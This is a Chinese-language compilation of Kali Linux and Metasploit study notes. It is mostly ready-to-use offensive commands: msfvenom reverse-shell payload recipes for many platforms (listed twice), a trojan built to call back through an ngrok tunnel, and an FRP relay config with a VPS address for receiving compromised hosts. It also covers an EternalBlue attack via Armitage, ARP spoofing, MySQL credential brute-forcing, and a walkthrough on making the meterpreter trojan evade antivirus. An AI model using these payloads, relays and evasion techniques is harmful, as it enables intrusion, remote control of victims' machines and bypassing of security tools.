渗透工具-白帽安全工程师Kali linux

  • ubuntu 20.04 安装metasploit
  • msfvenom常用生成 Payload 命令
  • 2022 安装 Armitage 傻瓜渗透msf
    • 介绍
    • 官网下载
    • build安装
    • 配置数据库
    • 扫描内网主机
    • 检查漏洞风险
  • 出现拒接连接问题
  • Kali linux 介绍安装及入门
      • 前身 BackTrack(BT) <--- ubuntu
      • kali <--- Debian linux 发行版
    • KaliLinux 渗透测试 艺术
      • U盘安装
    • 可以U盘启动
          • (如果虚拟机 稍后引导iso文件 且 移除暂时不用的组件)
          • 网速够快 NET适配 软件更新源(不建议)
          • 网速不行Vmnet1 (仅主机模式)
        • Ctrl+Alt+insert (重启系统)
      • 分区
        • (建议)使用整个磁盘 将所有文件放在同一个分区
      • 安装虚拟工具
      • 记录init 快照
      • 资源连接
    • 在这里插入图片描述
  • tools install
    • 更新
  • 易锦大学 热身 20211007 by:aming
    • CLAY 的 故事
    • 黑猫
    • 白猫
    • 红客
    • 网络安全法
  • 渗透测试 套路
  • 第二章--第1节--kali linux搭建
    • Kali Linux 2020.1修改root用户密码
    • 锁屏
    • msfvenom常用生成payload命令
    • Meterpreter持久控制服务器
    • Kali实战--HTTPS账户密码获取
    • ***HTTPS账户密码获取***
    • 实验环境:
    • SSH 连接
    • Wordpress渗透之Wpscan工具
    • 0708 centos matesploit 搭建
  • 通过ngrok穿透反弹shell
    • 0.0注册ngrok 内网穿透平台账号,开通免费隧道
    • 0x01 下载安装穿透client客户端
    • 0x02 Msfvenom 木&马生成
    • 0x03 启动msf 配置Exploit模块
    • 0x04 选择攻击载荷上线
  • Frp将外网meterpreter转发至本地msf
      • Msf Matesploit Framework 基础
    • 术语
    • 运行
  • 手撕metasploit中meterprter木马源码
      • 前言
    • 生成meterpreter木马
      • 使用Jd-Gui反编译Jar文件
      • 分析源码
      • 如何做到源码级免杀
    • Metasploit实战:SSH漏洞攻击
    • kali linux 系列 —— Metasploit 信息收集
    • KaliLinux——Metasploit&&shellcode日Android
      • #日android原理#
      • #日android条件#

ubuntu 20.04 安装metasploit

拉取安装文件,修改权限,执行安装


curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ > chmod 755 msfinstall && \
> ./msfinstall

使用msfconsole

msfvenom常用生成 Payload 命令

windows:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe

mac:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho

android:

//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

powershell:

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

linux:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf

php:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

aspx:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx

jsp:

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp

war:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw - o payload.war

nodejs:

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js

python:

msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py

perl:

msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl

ruby:

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb

lua:

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua

windows shellcode:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

linux shellcode:

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

mac shellcode:

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
 Options:-p, --payload <payload> 使用指定的payload
--payload-options 列出该payload参数
-l, --list [type] 列出所有的payloads
-n, --nopsled <length> 为payload指定一个 nopsled 长度
-f, --format <format> 指定payload生成格式
--help-formats 查看所有支持格式
-e, --encoder <encoder> 使用编码器
-a, --arch <arch> 指定payload构架
--platform <platform> 指定payload平台
--help-platforms 显示支持的平台
-s, --space <length> 设定payload攻击荷载的最大长度
--encoder-space <length> The maximum size of the encoded payload(defaults to the -s value)
-b, --bad-chars <list> 指定bad-chars 如: '\x00\xff'
-i, --iterations <count> 指定编码次数
-c, --add-code <path> 指定个win32 shellcode 文件
-x, --template <path> 指定一个 executable 文件作为模板
-k, --keep payload自动分离并注入到新的进程
-o, --out <path> 存放生成的payload
-v, --var-name <name> 指定自定义变量
--smallest Generate the smallest possible payload
-h, --help 显示帮助文件


2022 安装 Armitage 傻瓜渗透msf

msf是一个很好的渗透测试框架,但是苦于众多的指令,
因此出现一款软件可以将其图形化显示,这就是大名鼎鼎的armitage。

介绍

Armitage是一款Java写的Metasploit图形界面化的渗透软件,
可以用它结合Metasploit中已知的exploit来针对内网主机存在的漏洞自动化渗透,
由于作者已经不再更新版本,目前在kali linux 中是默认不安装的。

官网下载

kali tools地址:https://www.kali.org/tools/armitage/

下载地址:https://gitlab.com/kalilinux/packages/armitage



build安装

打开终端:
┌──(kali㉿kali)-[~/桌面/111/armitage-kali-master]
└─$ ./package.sh

结束后在release里面有unix和windows两个文件夹。

打开终端:
┌──(kali㉿kali)-[~/桌面/111/armitage-kali-master/release/unix/]
└─$ ./armitage

就可以运行了,但是这时候运行会出现问题,还需要配置数据库。

配置数据库

数据的默认地址是:
/etc/postgresql/
后面是版本号:14/main/
cd /etc/postgresql/14/main/

全部注释掉,然后加上:
vim pg_hba.conf

# "local" is for Unix domain socket connections only
local   all             all                           trust
# IPv4 local connections:
host    all             all             127.0.0.1/32            trust
# IPv6 local connections:
host    all             all             ::1/128                 trust

然后执行下面代码:

 ┌──(kali㉿kali)-[~]
└─$ sudo service postgresql stop ┌──(kali㉿kali)-[~]
└─$ sudo msfdb  reinit ┌──(kali㉿kali)-[~]
└─$ sudo service postgresql start┌──(kali㉿kali)-[~/桌面/111/armitage-kali-master/release/unix/]
└─$ sudo ./armitageupdate-rc.d postgresql enable


选中“payload”, 然后选择“windows” ➡️“meterpreter”, 找到所需的攻击载荷(即meterpreter_reverse_tcp)来充当被控端

双击这个攻击载荷,会弹出下图的界面,在该界面中可以对meterpreter_reverse_tcp进行设置

为meterpreter_reverse_tcp这个发出去的攻击载荷创建了一个主控端,Metasploit也将这个主控端称为handler。但是我们可能要控制多个攻击载荷,所以要将这个handler设置得跟攻击载荷一样。产生攻击载荷的命令如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.68.125 LPORT=5000 -f exe -o /root/payload.exe

使用相同的步骤,我们可以产生一个被控端,这里将其端口设置为5000,“Output”处选择要输出的格式,这里设置为exe,

单击“Launch”按钮,会产生一个基于meterpreter_reverse_tcp的被控端,并在原来的命令行窗口旁边产生一个新的控制窗口,这个窗口可以用来接收来自我们刚创建的被控端返回的连接
只需在目标主机上执行这个攻击载荷,就可以使用这个handler来控制目标主机了。现在将攻击载荷移动到目标主机中,当这个攻击载荷执行以后,我们就可以从远程控制目标主机了

扫描内网主机


检查漏洞风险


扫描 可能的风险。

选择一个你想测试的主机,然后在左侧寻找可以使用的exp,在这里我就使用永恒之蓝.

ms17
双击这个exp文件,便会弹出一个设置框,
这里我们只需要设置目标ip(rhost),也可以根据自己设置


开始攻击,攻击成功后便会获取到目标主机的shell。


靶机图标变成了显眼的红色且被闪电缠绕,生动形象地表示出了这台主机已经被攻击过.
依次选择Shell->Interact。便可以使用shell输入命令了。

出现拒接连接问题

问题
在输入正确的账号密码之后,任然跳出错误信息窗口显示有::

不支援 10 验证类型。请核对您已经组态 pg_hba.conf 文件包含客户端的IP位址或网路区段,以及驱动程序所支援的验证架构模式已被支援。

解决方法
1.安装Armitage ,官网下载压缩包或kali下输入 armitage , 按提示进行安装

2.启动postgresql服务

/etc/init.d/postgresql start
3.初始化msfdb

msfdb init

4.启动msfconsole

msfconsole

5.查看数据库连接状态

db_status

如果显示的是 postgresql selected,no connection 则有问题,可以退出msfconsole输入

msfdb reinit

再进入msfconsole查看会显示:

6.查看连接的账号密码

7.启动Armitage
输入正确的账号密码后(该密码在每次输入上面的命令后显示的都不一样),出现错误原因与数据库配置有关系。
8.配置postgresql

Kali linux 介绍安装及入门

前身 BackTrack(BT) <— ubuntu

kali <— Debian linux 发行版

功能: 数字取证 渗透测试 黑客攻防 安全系统 支持ARM架构
开发团队:Offensive Security Devon Kearns

KaliLinux 渗透测试 艺术


预装软件:
nmap (端口扫描)
Wireshark(数据包分析)
John the Ripper (密码破解)
Aircrack-ng(无线局域网测试套装)
Metasploit Framework(针对远程主机开发/执行Exploit codeing Tools)

运行:
硬盘启动 liveCD liveUSB

U盘安装

建议下载 win32 Disk Imager
写入镜像 --> u盘

可以U盘启动

32/64 可能是AMD架构
自己区分 有人说32-i386位的好用 ,自己测试
512MB以上
20GB以上

(如果虚拟机 稍后引导iso文件 且 移除暂时不用的组件)
网速够快 NET适配 软件更新源(不建议)
网速不行Vmnet1 (仅主机模式)
Ctrl+Alt+insert (重启系统)















引导顺序 硬盘 光盘 u盘(有系统物理机 更改引导顺序eg:F12)
开机启动中时候
F12 /Esc


install
自己选择语言
帐号密码

分区

LVM Logical Volume Manager(逻辑卷管理)
Linux环境下对磁盘分区进行管理的一种机制

(建议)使用整个磁盘 将所有文件放在同一个分区

写入磁盘

不使用网络镜像
GRUB 引导启动 /dev/sda
(密码忘了的话 --> 去看看linux 密码破解攻防系列)

安装虚拟工具

umount / dev / sr0 卸载光盘
clear
mount /dev /sr0 /media 挂载
ls /media
cd /media
tar zxvf xxx.tar.gz -C /xxx/xxx
cd /xxx/xxx
ls
./vmware-install.pl
默认回车

死循环 填写no
安装完毕
sync 保存当前配置
reboot 重启

记录init 快照

###  查看预装软件



完毕简单测试下

强行更改ip




:wq


https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2021.1/

资源连接

kali下载连接:https://www.kali.org/downloads/

#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free#官方源
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib#阿里巴巴
deb http://http.kali.org/kali kali-rolling main non-free contribdeb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

apt-get update //获取最新软件包的列表


apt-get dist-upgrade 将根据需要安装或删除软件包以完成升级,
apt-get upgrade 将自动安装但不会删除包。
apt --fix-broken install

安装fcitx
apt-get install fcitx

 apt-get install fcitx fcitx.googlepinyin

三、下载搜狗输入法

   https://pinyin.sogou.com/linux/

 sudo dpkg -i sogoupinyin_版本号_amd64.deb
注:
如果安装过程中提示缺少相关依赖,则执行如下命令解决:
sudo apt -f install

apt-getinstallibus ibus-pinyin


2020 版本 非root用户 使用标准的非特权用户来增加额外的安全性
】- kali kali

需要root访问的工具,以及诸如启动/停止服务等常见的管理功能,将以交互方式请求管理权限(至少在从Kali菜单启动时)

我们不再为每个桌面环境(DE)提供单独的映像。
相反,我们现在有一个单独的映像,可以选择在安装期间选择DE。
这意味着没有Xfce(这是我们从2019.4开始的默认选项)、GNOME、KDE、MATE或LXDE桌面的下载链接




tools install


cd /media/cdrom0/ 双击打开

cd
ls
sudo tar zxvf  VM+TAB补全 -C /root



更新



  • 更新之前 先要 换源
#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#阿里云deb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib#清华大学deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-freedeb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free#浙大deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-freedeb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free#东软大学deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contribdeb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib#官方源deb http://http.kali.org/kali kali-rolling main non-free contribdeb-src http://http.kali.org/kali kali-rolling main non-free contrib



  • 我是全选了 源

    apt-get update && apt-get upgrade && apt-get clean



































易锦大学 热身 20211007 by:aming



CLAY 的 故事


黑猫

白猫

红客

网络安全法


渗透测试 套路














第二章–第1节–kali linux搭建

Kali Linux 2020.1修改root用户密码

安装Kali Linux 2020.1系统后,需要使用root用户权限安装软件。
由于root用户的默认密码未知,所以需要在单用户模式下重新设置root用户密码。
操作步骤如下:

(1)启动Kali Linux,进入启动界面。
(2)选择Kali GNU/Linux项,并按下e键,进入Grub编辑界面。

(3)选择linux那一行,将ro 改为 rw 在此行末尾增加 init=/bin/bash 修改完毕以后按Ctrl+X 键进入单用户模式

(4)按下Ctrl+X或F10重新启动系统,即可进入单用户模式。。

(5)执行passwd命令,输入两次密码。注意,输入的密码是不显示的。

vim/cat   /etc/shadow


(6)重启Kali 到此登陆页面,输入刚才设置的账号密码,回车进行登陆,至此已经使用root账号登陆成功

— 上面错误 直接关闭虚拟机 再打开就重启

锁屏


msfvenom常用生成payload命令


windows:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 3 -f exe -o
payload.exe
mac:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f macho -o payload.macho
android:
//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f apk -o payload.apk
powershell:
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
linux:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f elf -o payload.elf
php:
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=
-f raw > shell.php
cat shell.php | pbcopy && echo '<?php ’ | tr -d ‘\n’ > shell.php && pbpaste >>
shell.php
aspx:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
jsp:
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻
击机端口 -f raw -o payload.jsp
war:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -
o payload.war
nodejs:
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.js
python:
msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -
f raw -o payload.py
perl:
msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.pl
ruby:
msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.rb
lua:
msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o
payload.lua
windows shellcode:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f c
linux shellcode:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f c
mac shellcode:
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f c

Meterpreter持久控制服务器



Kali实战–HTTPS账户密码获取

HTTPS账户密码获取

HTTPS(全称:Hyper Text Transfer Protocol over SecureSocket Layer)
以安全为目标的 HTTP 通道
在HTTP的基础上通过传输加密和身份认证保证了传输过程的安全性
HTTPS 在HTTP 的基础下加入SSL 层,
HTTPS 的安全基础是 SSL,因此加密的详细内容就需要 SSL。
HTTPS 存在不同于 HTTP 的默认端口及一个加密/身份验证层(在 HTTP与 TCP 之间)。
这个系统提供了身份验证与加密通讯方法。
现在它被广泛用于万维网上安全敏感的通讯,例如交易支付等方面

实验环境:

SSH 连接

Ctrl+Alt+F1命令行界面登陆运行 或者 init 3(有的童鞋虚拟机)
init+数字所代表的命令:
0:停机或者关机(千万不能将initdefault设置为0)
1:单用户模式,只root用户进行维护
2:多用户模式,不能使用NFS(Net File System)
3:完全多用户模式(标准的运行级别)
4:安全模式
5:图形化(即图形界面)
6:重启(千万不要把initdefault设置为6)

注意命令模式开机可能 numlock是锁着的 打开小写键盘 (密码可能带有数字)


logout ###让用户退出系统的Linux命令。



###出了点小插曲

ssh连接 如果出现了 access denied




###还有一个故障 就是 init转换后图形化登陆循环
在网上找找有相应教程这里就不说了

##弄一个 xshell 得资源 需要的自取
690313-111999-999313 码
链接:https://share.weiyun.com/505zSO7 密码:rnawkn

Xshell 连上了

之前用的 putty suite Xshell比putty功能强大
所以果断换 eg:复制SSH渠道
或者 Xshell:> ls 显示连接主机用户
或者 便捷命令
arpspoof命令进行断网攻击(ARP欺骗)
arpspoof -i eth0 -t 192.168.1.112 192.168.1.1
与网络有关的-i(interface)
网卡eth0
目标-t(target)
目标IP:192.168.1.112
目标主机网关192.168.1.1

ettercap -i eth0 -Tq
driftnet -i eth0 -b -a -d /pic

解释下这几个参数
-i 监听网卡
-b 声音提醒
-a 保存图片(图片不会显示)
-d 图片保存目录




sslstrip

Wordpress渗透之Wpscan工具

一、什么是Wpscan?什么是Wordpres?

1.WpscanWPScan是一款针对wordpress的安全扫描软件;可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等。2.WordpressWordPress是一种使用PHP语言和MySQL数据库开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。WordPress有许多第三方开发的免费模板,安装方式简单易用。如果要做一个自己的模板,则需要有一定的专业知识,至少要懂的标准通用标记语言下的一个应用HTML代码、CSS、PHP等相关知识。

建站流程

  1. 注册域名
  2. 申请虚拟主机(国内主机:速度快,较贵,而空间较小;国外主机:便宜,速度慢,空间一般无限制)
  3. 在虚拟主机上绑定自己的域名
  4. 下载WordPress程序
  5. 修改域名的DNS解析
  6. 创建WordPress数据库
  7. 修改WordPress的安装配置文件
  8. 上传WordPress程序至ixwebhosting主机域名空间(ftp上传)
  9. 访问域名/wp-admin/install.php进行wordpress安装。填写博客信息及邮箱

二、Wpscan命令详解

  利用-h命令,可查看Wpscan的常用选项,功能介绍,例子等;

root@kali:~# wpscan -h


    __          _______   _____                    \ \        / /  __ \ / ____|                   \ \  /\  / /| |__) | (___   ___  __ _ _ __    \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \   \  /\  /  | |     ____) | (__| (_| | | | |  \/  \/   |_|    |_____/ \___|\__,_|_| |_|  WordPress Security Scanner by the WPScan Team   Version 2.8  Sponsored by Sucuri - https://sucuri.net

 https://data.wpscan.org/plugins.json
https://data.wpscan.org/plugins.json.sha512
https://data.wpscan.org/themes.json
https://data.wpscan.org/themes.json.sha512
https://data.wpscan.org/wordpresses.json
https://data.wpscan.org/wordpresses.json.sha512
https://data.wpscan.org/timthumbs-v3.txt
https://data.wpscan.org/timthumbs-v3.txt.sha512
https://data.wpscan.org/config_backups.txt
https://data.wpscan.org/config_backups.txt.sha512
https://data.wpscan.org/db_exports.txt
https://data.wpscan.org/db_exports.txt.sha512
https://data.wpscan.org/dynamic_finders.yml
https://data.wpscan.org/dynamic_finders.yml.sha512
https://data.wpscan.org/wp_fingerprints.json
https://data.wpscan.org/wp_fingerprints.json.sha512
https://data.wpscan.org/LICENSE
https://data.wpscan.org/LICENSE.sha512
————————————————

C:\WINDOWS\system32\drivers\etc




0708 centos matesploit 搭建

 yum groupinstall 'Development Tools'yum -y install sqlite-devel libxslt-devel libxml2-devel java-1.7.0-openjdk libpcap-devel nano openssl-devel zlib-devel libffi-devel gdbm-devel readline-devel nano wget
yum -y install ruby
yum -y install yaml
yum -y install postgresql

通过ngrok穿透反弹shell

0.0注册ngrok 内网穿透平台账号,开通免费隧道

网址:https://www.ngrok.cc


eg: 192.168.254.128 我的内网ip


0x01 下载安装穿透client客户端

地址:https://www.ngrok.cc/sunny/linux_amd64.zip?v=2.1

unzip./sunny  clientid 隧道id


0x02 Msfvenom 木&马生成

kali命令 生成EXE木马文件:

 msfvenom  -p windows/meterpreter/reverse_tcp LHOST=tcp://free.idcfengye.com LPORT=10206 -f exe -o /home/amingmm/Desktop/puty.exe

0x03 启动msf 配置Exploit模块

 Use exploit/multi/handler

0x04 选择攻击载荷上线

  set payload windows/meterpreter/reverse_tcp

 set
run/exploit

Frp将外网meterpreter转发至本地msf

https://github.com/fatedier/frp/releases【下载】

解压
● kali端 frpc配置

 [common]
server_addr = 121.5.64.200   #vps地址
server_port = 2580         #vps监听端口[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 12580     # msf载荷 监听端口 【即内网主机监听端口】
remote_port = 6666     # vps流量转发端口【流量出口 载荷端口】 

服务端

 [common]
bind_port = 2580  【服务端监听端口】
 ./frps(frpc) -c frps.ini (frpc.ini)  开启服务端(客户端)systemctl start frps
systemctl restart frps
systemctl stop frps

● frp 连接流程
frps开启两个端口监听----< 内网客户端frpc 开启 tcp连接到 vps
vps–内网主机建立连接 连接1 建立

● 肉鸡上线 流程
载荷创建进程 主动连接 vps:载荷端口
管道流量转发 把 载荷端口 流量 通过tcp 连接 发包 传送到 内网kali端

● kali端 上线流程
kali端 frpc客户端 通过管道 将流量 转发给 msf handler -->监听端口

Msf Matesploit Framework 基础


漏洞框架 方便强大 框架全球性exp poc 脚本利于测试

术语

运行


cd = back

ls = dir pwd

banner

color

connect 链接一个主机、网络
edit 编辑一个模块
exit 退出控制台
get 获取变量
getg 全局变量
go_pro 进入GUI ····有的版本没有
grep 输出命令
info 查看模块详细信息
irb drop 进脚本模块 ruby
jobs 显示 你使用 的 模块

kill 处理掉一个 项目进程
load 加载一些插件
loadpath 插件路径
quit 退出控制台
route 做跳板代理
save 保存活跃数据
search 搜索漏洞模块

sessions 选择会话 -i x (shell 反弹回来 选择序号)

set 设置 参数 RHOSTS 地址/网段

设置字典
unset

unsetg 全局重新设置

show options 查看配置选项

exploit 执行



db_connect 链接

db_disconnect 断开
db_export 导出
db_import 导入
db_nmap 扫描结果入库

service postgresql start

status

service metasploit start

msfconsole





扫描结果

msfconsole
search mysql
use auxiliary/scanner/mysql/mysql_login

set RHOST 192.168.10.3
set user_file 用户名字典的路径(位置)
set pass_file 密码字典的路径(位置)
set STOP_ON_SUCCESS yes (只要爆破成功就停止)
run 启动攻击,开始爆破

Windows10 Ruby

手撕metasploit中meterprter木马源码

前言

自从将CobaltStrike二开之后放在了GITHUB,
MSF的源码级免杀怎么做的,今天决定带大家手撕metasploit中meterpreter源码。

生成meterpreter木马

 msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 > yanbuguohengyang.jar

使用Jd-Gui反编译Jar文件

下载Jd-Gui

 https://download.apponic.com/crTvxmk7KUri_YfUJhkmHBXYcZuqbStoYn0kPSXJn4kr1hhFaL4IrWGdr2GIbA7AtEJZOyNuCoTB2v39p-qywhEQwQgvEK1j7wQG4qZJ1Xv3DcJrJG8AHHDL05nArb0CmWEKPODCXLURQryUsOrnccH2p_4m1j8M_52d/

反编译Jar:

保存源代码


解压文件

分析源码


马儿开局声明了几个全局变量
1.判断当前的操作系统
2.获取当前系统的路径分割符
3.判断系统是否基于unix内核
4.判断路径分隔符是否是 “;”
5.获取Jdk的安装目录

1.创建IO流读取配置文件
2.获取配置文件中Executable字段
如果字段不为空
1.获取系统一定存在的系统路径
2.在一定存在的系统路径下创建 “~spawnxxxx.tmp.dir”文件
3.在创建的dir下创建一个文件名为 配置文件中key为Executable的目录
4.调用方法传入1.反射获取到的Payload对象,2.Executable的值,3.创建的文件 (内部将Executable的值写入到创建到的新文件下)
5.删除配置文件中的Executable
6.配置文件写入DroppedExecutable值为新创建的值的不同操作系统的绝对路径
此代码Executable字段为空,不去执行判断内容

配置文件内容如上图所示
1.spawn值下文阐述
2.LHOST为回连地址
3.LPORT为回连端口

1.获取spawn值内容
如果spawn值大于0则
1.将Spawn减去1重新赋值给配置文件的Spawn
2.获取当前系统临时路径.dir
3.将此文件(也就是木马文件)写入系统临时路径
4.将获取到的jdk路径运行被重新写入的马儿路径(此过程为spawn路径-1的过程)

如果spawn值不大于0则

1.读取配置文件的回连地址
2.读取配置文件的端口
3.如果端口小于0的情况此处不做赘述
4.如果端口不小于0则与获取到的回连地址与端口建立Socket连接
5.建立连接后使用IO流获取服务端返回结果
6.调用bootstrap()函数

1.使用IO流获取服务端返回内容
2.判断paramString是否为空(上文可知为空,所以为空的逻辑不做阐述)
3.通过反射找到javapayload.stage.
4.将反射获取到的类采用反射invoke函数执行
5.定义trycatch捕获异常抛出
以上为MSF木马源码逻辑总线,其余函数为辅助主线完成函数

其中包括
1.寻找临时文件绝对路径
2.寻找Jdk的路径
3.针对不同系统对路径分割符号的替换
但是这些都不重要。

如何做到源码级免杀

通过以上对MSF木马的刨析,可以看出MSF采用木马三次加载(根据spawn的值决定)最后释放恶意代码,但是若如此做的目的我尚且不详,
可能是为了起到免杀的作用.
还有就是这个马儿的通用性,它可以在不同的类型的操作系统上线是因为其中很多东西都做了动态处理,
如路径分隔符,jdk的动态查找等。

了解了以上几点内容最终分享一个源码级免杀的案例吧

代码中我去除了很多马儿的原有逻辑,如上文提到的兼容性等问题,循环加载等问题。
1.直接建立socket连接
2.直接将服务端的数据加载
3.不再从配置文件读取回连地址端口,硬编码写死
如此做保留了建立连接的关键性代码,做到了客户端和服务端的对接。

关于免杀
我一直认为源码级免杀是比shellcode的免杀要好做的,这其中的原因是因为源码级免杀牵扯很多api,杀软大多数只能通过木马特征来查杀,但是shellcode的免杀加载器所遇到的api,申请内存空间,创建线程运行等函数已经被列入高危函数,可免杀的发展空间并无源码级免杀发展的空间大。
1.这个客户端的免杀率我一年多前上传的时候是vt都过了的,现在我懒得上传了,大家自行研究吧。这篇文章是我继《Cobaltstrike免杀从源码级到落地思维转变》出的前文,原因是因为很多人看了那篇文章后让我出一个分析msf的文章做衔接。
2.还有些人问我免杀很好过,但是始终存在一个问题就是免杀的木马在相对时间过后无法免杀的问题,这其实就引申出来免杀平台的作用。杀软是一套程序,是程序就有自己的运行逻辑,如果我们掌握这种规律并且自己的逻辑在杀软逻辑之上的话,那么杀软只能追着免杀平台生成的木马封,永远都无法追上。具体的实现逻辑我不能说,大家体会吧……hahahaha
但是可以分为以下两点
1.shelcode的免杀,shellcode的随机性
2.加载器的免杀,加载器的随机性
3.反虚拟机,反虚拟机的红队调试
4.反沙箱,反沙箱的分析

  • Metasploit实战:SSH漏洞攻击








  • kali linux 系列 —— Metasploit 信息收集

  • 注册信息
  • 邮箱
  • 电话
  • 地址
  • 大小写 敏感

  • 2.0 以后 开启postpresql 之后自动连接 还支持 mysql
  • 不然还得 db_connect




  • KaliLinux——Metasploit&&shellcode日Android

#日android原理#
  • 生成android mu 马子 xxx.apk
  • 安装运行
  • 反弹连接——>PC
#日android条件#
  • 网络连通 手机在线 电脑内外网皆可
  • 让android安装apk(想办法 137 爆破或者 其他方法 在这里不表述)




渗透工具-白帽安全工程师Kali linux系统相关推荐

  1. Kali Linux 系统暴力破解压缩包密码工具总结

    在 Kali Linux 系统中,有多种工具可以用于暴力破解压缩包密码.下面将介绍几种常用的工具,包括 fcrackzip.zipcracker 和 John the Ripper. 1.fcrack ...

  2. Kali Linux系统正确完整安装指南教程

    Kali Linux系统作为白帽.黑帽最受欢迎的渗透测试系统,你如果是一个安全渗透专家或者网络安全管理员,必须要学会慎重并且合理地利用这个系统,因为对目标系统造成的实质伤害会带来法律的约束以及制裁! ...

  3. 全网超详细的VMware虚拟机安装Kali Linux系统以及首次启动Kali Linux系统的注意事项

    文章目录 1. 简述Kali Linux 2. 下载Kali Linux的镜像文件 3. 安装Kali Linux 4. 首次启动Kali Linux 5. 其他方法安装Kali Linux 1. 简 ...

  4. 【Linux篇】kali Linux系统一次性安装软件包

